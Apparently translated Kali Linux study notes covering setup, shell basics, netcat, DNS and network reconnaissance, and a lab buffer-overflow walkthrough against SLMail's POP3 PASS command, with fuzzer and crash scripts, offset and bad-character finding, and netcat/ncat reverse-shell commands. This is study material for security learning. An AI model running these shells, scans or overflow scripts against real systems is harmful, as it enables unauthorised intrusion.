Kali Linux study notes

I: Installing Kali
sudo: prefix a command to run it as root
reboot: restart; shutdown -h now: shut down
1. Change user
Step one: sudo passwd root
Step two: enter the current password (kali) to confirm
Step three: enter the new password, then enter it again to confirm; reboot and log in as root with the new password
Account 1: root (administrator account); account 2: kali / kali (ordinary account)
2. Changing the source and updating
1. vim /etc/apt/sources.list: open the source list in the editor and add a mirror
2. If saving fails because of permissions, save with :wq!
3. After changing the source: apt-get update && apt-get upgrade && apt-get clean updates the package lists and upgrades the installed software
3. Localization
1. In the terminal, apt-get install xfonts-intl-chinese ttf-wqy-microhei installs Chinese fonts (they can be downloaded once the source has been changed)
2. Change the locale: dpkg-reconfigure locales (as root) opens a text menu (Space toggles a checkbox, Tab moves between fields, * marks a selected entry); select zh_CN.UTF-8, confirm, then choose zh_CN.UTF-8 as the default
3. In the terminal, reboot restarts the system. On the login screen check whether the language list at the top shows zh_CN.utf8; open the list and select Chinese (China). (If only part of the interface changes, a reboot solves many problems)
4. Installing an input method
1. apt-get update
2. apt-get install fcitx
3. apt-get install fcitx-googlepinyin
Then restart; the new input method appears and needs no further configuration. Click the icon in the upper right corner to switch input methods; you can also configure your own shortcuts.
Terminal shortcut
In Kali 2020.1 gnome-terminal is no longer the command that starts the terminal; it is now xfce4-terminal.
In Settings -> Keyboard, click Add and enter xfce4-terminal.

Document reference: https://blog.csdn.net/Jack0610/article/details/103931466

II: Getting familiar with the environment
1. Basic bash commands
ls: list the current directory (equivalent to dir on Windows)
Default colours in the Kali shell:
blue = directory, white = ordinary file, green = executable, red = compressed file
-l: long listing; the first letter of the first column gives the file type: d directory, c character device, b block device, l symbolic link, - regular file
-a: show hidden files
-h: human-readable sizes
--sort=time / --sort=size: sort by time / by size
cd: change directory (same as cd on Windows)
.: the current directory
..: the parent directory
pwd: print the current working directory; ~ is the user's home directory (/root for root)
cat /path: print the whole contents of a text file
more /path: show the file one screen at a time, forward only
less /path: like more
tail /path: show the last 10 lines by default; -n <number> sets the number of lines
watch -n <seconds> command: re-run the command every <seconds> seconds
rm filename: delete a file
-r: delete a directory
cp filename [newname]: copy a file
-r: copy a directory
pid: the process ID shown in the process list
kill <pid>: kill the process
q: quit the process viewer
ps: view processes
-ef
aux
grep: filter output; egrep is the extended version
ifconfig <interface> up / down: bring the interface up / down
netstat -pantu: show local TCP and UDP connections with their addresses and owning process
Example: netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}' | egrep -v 'and|Address' | cut -d ':' -f 1 | sort | uniq > IP
Note: awk keeps the fifth column (the foreign address), cut splits on ':' and keeps the first field (the IP), sort orders the result and uniq removes duplicates; the list is written to the file IP
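The netstat pipeline above, reworked as an added Python example (it is not part of the original notes) that parses a constructed sample of netstat -pantu output and returns the unique remote IPs. It goes slightly beyond the shell pipeline: it splits the port off from the right, so an IPv6 peer such as ::1 survives where cut -d ':' -f 1 would return an empty field. The sample output below is constructed, not captured from a real host.

```python
# Constructed sample of `netstat -pantu` output (not captured from a real host)
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      512/sshd
tcp        0      0 192.168.43.100:22       192.168.43.182:51234    ESTABLISHED 733/sshd: root@pts/0
tcp        0      0 192.168.43.100:51000    93.184.216.34:443       ESTABLISHED 801/firefox
tcp        0      0 192.168.43.100:51001    93.184.216.34:443       ESTABLISHED 801/firefox
tcp6       0      0 :::80                   :::*                    LISTEN      600/apache2
tcp6       0      0 ::1:6010                ::1:40112               ESTABLISHED 733/sshd: root@pts/0
udp        0      0 0.0.0.0:68              0.0.0.0:*                           450/dhclient
"""


def remote_ips(netstat_output):
    """Replicate the pipeline
         netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}'
         | egrep -v 'and|Address' | cut -d ':' -f 1 | sort | uniq
    but split the port off from the right so IPv6 peers survive."""
    ips = set()
    for line in netstat_output.splitlines():
        # egrep -v '0.0.0.0|:::' : drop wildcard listeners (not real peers)
        if "0.0.0.0" in line or ":::" in line:
            continue
        fields = line.split()
        # egrep -v 'and|Address' : drop the two header lines
        if len(fields) < 5 or "and" in line or "Address" in line:
            continue
        foreign = fields[4]            # awk '{print $5}' : the Foreign Address column
        # cut -d ':' -f 1 would keep everything before the FIRST colon; rpartition
        # keeps everything before the LAST colon, so "::1:40112" yields "::1"
        host, _, _port = foreign.rpartition(":")
        if host:
            ips.add(host)
    return sorted(ips)                 # sort | uniq


if __name__ == "__main__":
    for ip in remote_ips(SAMPLE_NETSTAT):
        print(ip)
```

Run it and it prints the two IPv4 peers and the ::1 loopback peer; on a real host, replace SAMPLE_NETSTAT with the output of netstat -pantu read from stdin.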
route: show the routing table
mount: mount a file system on a directory
-o loop filename.iso /directory: mount an iso file on the specified directory
dmesg: kernel messages; used much like tail
find: search a directory for files
-name: search by file name; / searches from the root directory
-iname: like -name but case-insensitive
*: wildcard
whereis: same purpose as find, fewer results and faster; searches the package-manager locations
-b filename: find only binaries
echo: print text (also used to write text into files)
2. Basic vim operations
Open: vim filename (or vi filename) opens the file in the editor
Edit: press i
Quit: 1. press Esc 2. press Shift + : 3. :wq saves and exits, :q! exits without saving, :wq! forces save and exit
i: enter insert mode
Esc: return to command mode
dd: delete the current line (command mode)
o: insert a new line below (command mode)
yy: copy the current line (command mode)
p: paste (command mode)
a: append after the cursor
3. Pipes
Pipe characters:
|: the output of the command before the bar becomes the input of the command after it
&: both commands run (the first is put in the background)
&&: the second command runs only if the first succeeds; if the first fails the second is not run
||: the second command runs only if the first fails; if the first succeeds the second is not run
4. Shell scripts
#!/bin/bash on the first line tells the system which interpreter runs the file
III: Optimizing the Kali working environment
1. Network configuration
Temporary IP address (lost after a restart)
dhclient eth0: obtain an IP address automatically
ifconfig eth0 <ip>: set the IP address
route add default gw <gateway ip>: set the default gateway
echo nameserver <ip> > /etc/resolv.conf: change the DNS address
Fixed IP address
cat /etc/network/interfaces: the network interface configuration file
address: IP address
netmask: subnet mask
gateway: gateway
network: network address
broadcast: broadcast address
dns-nameservers: DNS address
2. Environment configuration
IV: Basic tools
1. netcat
base64 command: base64 encodes what you type; Ctrl+D ends the input
Telnet-like use
-v: verbose output
-n: do not resolve domain names (give an IP address and port)
Transferring text
One side opens a listening port, the other side connects to it as a client
Host A: nc -l -p <port>; host B: nc -nv <ip> <port>
-l: listen; -p: the port number to listen on
Check with netstat -pantu | grep 333
-q <number>: exit <number> seconds after the input ends
Redirection: > writes the output to a file, < reads the input from a file
Transferring a directory
Sending end: tar -cvf - directory | nc -lp port -q 1
Receiving end: nc -nv ip port | tar -xvf -
Transferring an encrypted file
A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
Streaming
A: cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
Port scanning
-z: scan only, send no data
-u: probe UDP ports
nc -nvz <ip> 1-65535
nc -nvzu <ip> 1-1024
Cloning a hard disk remotely
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
dd: block-level copy command
if: input file; of: output file
Remote control
Forward:
A (controlled host): nc -lp 333 -c bash
B: nc -nv 1.1.1.1 333
Reverse:
A: nc -lp 333
B (controlled host): nc -nv 1.1.1.1 333 -c bash
On Windows, nc uses cmd in place of bash
-c bash: hands a shell to the other end
DNS: port 53
ncat: encrypted remote control
nc has no authentication or encryption
ncat is included in the nmap package
A: ncat -c bash --allow 192.168.43.182 -vnl 333 --ssl
B: ncat -nv 192.168.43.100 333 --ssl
nc parameters differ between systems and platforms
2. wireshark
Ethereal: sniffer and protocol analyzer
Capture engine: libpcap on Linux, winpcap on Windows

3. tcpdump
V: Passive information collection
Information collection:
FQDN: fully qualified domain name
Recursive queries and iterative queries
DNS records: A host record, CNAME alias record, PTR reverse-lookup record, MX mail exchange record
nslookup
DNS information collection
dig
+noall +answer
-x: reverse lookup
bind version information: dig txt chaos VERSION.BIND @ns.sina.com
Trace: +trace
Zone transfer: dig @ns1.example.com example.com axfr
host -T -l sina.com ns3.sina.com
Viewing command manuals:
man
info
--help, -h
DNS subdomain brute force
fierce -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist a.txt
dnsdict6 -d4 -t 16 -x sina.com
dnsenum -f dnsbig.txt -dnsserver 8.8.8.8 -o sina.xml sina.com
dnsmap sina.com -w dns.txt
dnsrecon -t brt -d sina.com --lifetime 10 -D dnsbig.txt
dnsrecon -t std -d sina.com
DNS registration information
whois
whois -h whois.apnic.net 192.0.43.10
Search engines
Shodan filters:
net
city
country
port
os
hostname: host or domain name
server
Google
Recon-ng
VI: Active information collection
1. Discovery
Layer 2 discovery
arping
arping 1.1.1.1 -c 1
arping 1.1.1.1 -d: report whether the IP answers with different MAC addresses (detects ARP spoofing)

nmap
nmap 192.168.1.1/24 -sn

netdiscover
Active:
netdiscover -i eth0 -r 1.1.1.0/24
netdiscover -l iplist.txt
Passive:
netdiscover -p

Scapy
apt-get install python3 gnuplot
Layer names must be capitalised and followed by ()
sr1(): send a packet and receive one reply

Layer 3 discovery
ICMP protocol
traceroute
ping -r
hping3
Layer 4 discovery
Host discovery
Scapy
nmap <ip> -PU<port> -sn
ACK discovery: nmap <ip> -PA<port> -sn
hping3
VII: Vulnerability exploitation
nmap
root@kali:/usr/share/nmap/scripts# cat script.db | wc -l
smb-vuln-ms10-061.nse
Shared printer vulnerability
nmap -p445 --script=smb-enum-shares.nse --script-args=smbuser=admin,smbpassword=pass 1.1.1.1
Vulnerability scanners
OpenVAS
A branch of the Nessus project
Install OpenVAS
apt-get install openvas
Configure the installation
openvas-setup
Check the setup
openvas-check-setup
View current accounts
openvasmd --list-users
Change an account password
openvasmd --user=admin --new-password=password
Upgrade OpenVAS
openvas-feed-update
Start the OpenVAS service
openvas-start
Nessus
Download
Installation:
dpkg -i
Installation path: /opt/nessus
Start the service:
/etc/init.d/nessusd start

VIII: Buffer overflow
Windows
"'netstat' is not recognized as an internal or external command"
The directory containing the command is not on the search path, i.e. the environment variable is not configured; once it is, the command can be run from any path.
Configure the system variables: in the Path variable add "%SystemRoot%\system32;"
Re-open the cmd window (this is required, otherwise the change has no effect)
netstat -ano
Fuzzer
XP client software
SLMail 5.5, mona.py, Immunity Debugger
XP side
Firewall port exceptions: SMTP 25, POP3 110
Allow ICMP echo requests
Test from the Kali side
nc 192.168.43.147 110, nc 192.168.43.147 25
The POP3 PASS command has a buffer overflow
Security mechanisms on Win7 and later:
DEP: prevents code from executing from data pages
ASLR: randomises the addresses at which the program and its DLLs are loaded; the addresses change at every restart
The EIP register holds the address of the next instruction
Fuzzing Python script
Idea: change EIP to the memory address of the shellcode and write the shellcode into that address space; the program reads the EIP value, jumps to the shellcode and executes it
On Kali the Python script can be edited in vim or mousepad; after saving, change the file permissions to make it executable
2.py
#!/usr/bin/python3
import socket

# Build test strings of increasing length: "A", then 100, 300, 500, ... B's
buffer = ["A"]
counter = 100
while len(buffer) <= 50:
    buffer.append("B" * counter)
    counter = counter + 200

# Send each string as the POP3 PASS argument; the length at which the service
# stops answering is the size that overflows the buffer
for string in buffer:
    print("fuzzing pass with %s bytes" % len(string))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.43.147", 110))
    s.recv(1024)
    s.send(b"user test\r\n")
    s.recv(1024)
    s.send(("pass " + string + "\r\n").encode())
    s.send(b"quit\r\n")
    s.close()
Image: https://uploader.shimo.im/f/vceG0VHfpUYnjcPJ.png
Image: https://uploader.shimo.im/f/AIKerQJcHd8s7i22.png
3.py
#!/usr/bin/python3
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 2700 bytes of "A": the length at which the fuzzer crashed the service
buffer = "A" * 2700
try:
    print("\nSending evil buffer...")
    s.connect(("192.168.43.147", 110))
    data = s.recv(1024)
    s.send(b"user test\r\n")
    data = s.recv(1024)
    s.send(("pass " + buffer + "\r\n").encode())
    print("\nDone!.")
except socket.error:
    print("could not connect to pop3")

Finding the exact 4-byte overflow position
Binary search (dichotomy)
4.py
Unique-string method using the Ruby script:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#!/usr/bin/python3
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# The 2700-byte unique pattern produced by pattern_create.rb -l 2700, split into four
# adjacent string literals (Python joins them) so that each line stays readable
buffer = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
    "Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9"
    "Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9"
    "Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
)

try:
    print("\nSending evil buffer...")
    s.connect(("192.168.43.147", 110))
    data = s.recv(1024)
    s.send(b"user test\r\n")
    data = s.recv(1024)
    s.send(("pass " + buffer + "\r\n").encode())
    print("\nDone!.")
except socket.error:
    print("could not connect to pop3")
Image: https://uploader.shimo.im/f/dcoqQfQP0sImNj4f.png
EIP = 39694438; read the bytes in reverse (little-endian) order
hex 38 44 69 39 = ASCII "8Di9"

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

calculates the corresponding offset
Image: https://uploader.shimo.im/f/i5iBJYnztiUcs8sf.png
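How the unique-string method turns the EIP value into an offset, as an added Python re-implementation of the pattern_create / pattern_offset idea (this is not the Metasploit scripts' own code). pattern_create generates the same Aa0Aa1... sequence, and pattern_offset unpacks the register value as little-endian, so 0x39694438 becomes the bytes 38 44 69 39 = "8Di9", which is found at offset 2606, the number used in 5.py.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern Aa0 Aa1 ... Aa9 Ab0 ... Zz9: every 4-byte window is unique within
    the first 26 * 26 * 10 * 3 = 20280 bytes, so a crash value maps to one position."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=2700):
    """value: the register contents as a hex string (e.g. '39694438') or an int.
    Returns the byte offset at which those 4 bytes sit in the pattern, or -1."""
    if isinstance(value, str):
        value = int(value, 16)
    # x86 is little-endian: the register shows 0x39694438, but the bytes that were
    # copied into it, in memory order, are 38 44 69 39 = "8Di9"
    needle = struct.pack("<I", value).decode("ascii", errors="replace")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_offset("39694438"))  # 2606: the size of the 'A' padding in 5.py
```

The same routine answers the question the debugger poses after any crash with a pattern in a register; a result of -1 means the register was not filled from the pattern (for instance 0x41414141 from the plain "A" buffer of 3.py).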
5.py
Placing the shellcode in the space ESP points to
Python script: buffer = 'A' * 2606 + 'B' * 4 + 'C' * (3500 - 2606 - 4)
Calculate the space available at ESP: 416 bytes, enough for the shellcode
7.py: determining bad characters
Depending on the program, protocol and bug, some characters are treated specially (bad characters); the fixed return address and the shellcode must not contain them
null byte (0x00): terminates string copy operations
carriage return (0x0D): ends the POP3 PASS command
Idea: send the 256 characters 0x00-0xff and find all the bad characters

badchars = 0-255 (as hex bytes)
Bad characters found: 0A (line feed), 0D (carriage return), 00 (null)
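The iterative bad-character search described above, as an added Python example that is not the notes' 7.py. simulated_target is a constructed stand-in for what the debugger shows at ESP after each send: like the POP3 line parser and a C string copy, it stops at NUL, CR or LF. find_bad_chars sends every candidate byte, removes the first byte that did not survive, resends, and repeats until the whole sequence comes back intact; 0x00 is taken as known bad from the start, as in the notes.

```python
def simulated_target(data):
    """Constructed stand-in for the memory the debugger shows at ESP after a send:
    the copy stops at the first NUL, CR or LF (assumption, not SLMail's real code)."""
    cut = len(data)
    for terminator in (b"\x00", b"\r", b"\n"):
        idx = data.find(terminator)
        if idx != -1:
            cut = min(cut, idx)
    return data[:cut]


def first_mismatch(sent, observed):
    """Index of the first sent byte that is missing or altered in observed, or -1."""
    for i, byte in enumerate(sent):
        if i >= len(observed) or observed[i] != byte:
            return i
    return -1


def find_bad_chars(probe, known_bad=(0x00,)):
    """Send all bytes not yet known to be bad, compare with what arrived, record the
    first corrupted byte, and resend without it until everything survives."""
    bad = list(known_bad)
    while True:
        candidates = bytes(b for b in range(256) if b not in bad)
        observed = probe(candidates)
        idx = first_mismatch(candidates, observed)
        if idx == -1:
            return sorted(bad)
        bad.append(candidates[idx])


if __name__ == "__main__":
    print([hex(b) for b in find_bad_chars(simulated_target)])  # ['0x0', '0xa', '0xd']
```

Against a real service, probe would send the bytes over the socket and return the bytes read back from the debugger's memory dump at ESP; each round removes one more bad character, which is why the notes' conclusion (00, 0A, 0D) takes several sends to reach.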

Redirecting the data flow
Replace the value of EIP with the address of ESP
But the ESP address changes at random, so hard-coding it is not feasible
SLMail is multi-threaded; the operating system assigns each thread its own address range, and the range of each thread is unpredictable

Approach
Find a system module loaded at a fixed memory address
Look for a jmp esp instruction in that module, then jump indirectly through that instruction to ESP, which executes the shellcode
mona.py identifies the loaded modules; search them for a "return address" that is jmp esp

mona.py requires Python 2.7 or later

Source: https://blog.csdn.net/q20010619/article/details/104777224